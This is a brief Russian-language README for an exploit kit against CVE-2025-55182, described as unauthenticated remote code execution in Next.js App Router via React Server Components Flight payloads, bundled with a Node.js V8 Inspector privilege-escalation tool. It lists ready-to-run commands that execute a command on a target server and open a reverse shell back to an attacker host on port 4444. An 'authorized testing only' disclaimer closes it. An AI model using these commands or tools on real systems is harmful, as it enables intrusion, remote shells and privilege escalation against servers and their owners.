
Автономный эксплойт для CVE-2025-55182, реализующий неаутентифицированное удалённое выполнение кода (RCE) в Next.js App Router через десериализацию Flight в React Server Components, с обратной оболочкой и вспомогательным инструментом для повышения привилегий через Node.js V8 Inspector.
Автономный эксплойт для CVE-2025-55182 в приложениях Next.js App Router, использующих React Server Components. Специально сформированные RSC Flight-полезные нагрузки, отправляемые на endpoint server-action, обеспечивают неаутентифицированное удалённое выполнение кода. Включает вспомогательный инструмент локального повышения привилегий Node.js V8 Inspector (debug-port), который выполняет код в привилегированном процессе через обход песочницы process.mainModule.require.
CVE: CVE-2025-55182
python3 -m pip install requests # для Python PoC
cdp_privesc.pypython3 cdp_privesc.py <target>
react2shell-poc.py (RSC RCE — встроенный, см. Credits)python3 react2shell-poc.py -t http://TARGET:3000 -c "id" # эксфильтрация команд на основе ошибок
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py — это публичный PoC для CVE-2025-55182 от p3ta00, включённый без изменений
из https://github.com/p3ta00/react2shell-poc для создания автономной цепочки.
cdp_privesc.py (локальное повышение привилегий через Node.js V8 Inspector) — оригинальная разработка.
Только для авторизованного тестирования безопасности и образовательных целей. Запускайте это только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
Автор: r3vpwnx